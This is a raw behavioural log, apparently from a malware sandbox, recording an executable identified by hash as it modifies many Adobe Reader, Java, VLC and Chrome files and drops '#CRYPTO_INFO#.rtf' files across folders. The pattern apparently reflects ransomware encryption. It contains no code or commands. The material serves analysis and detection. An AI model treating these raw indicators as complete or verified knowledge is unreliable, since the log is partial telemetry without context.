C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_fillandsign_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_da_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setEmbeddedCP 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-1x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\s_thumbnailview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\UnlockPop.aifc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Toast.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nl_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\bg_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\add-comment-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\javaws.policy 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_initiator.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_closereview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\NewStep.001 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 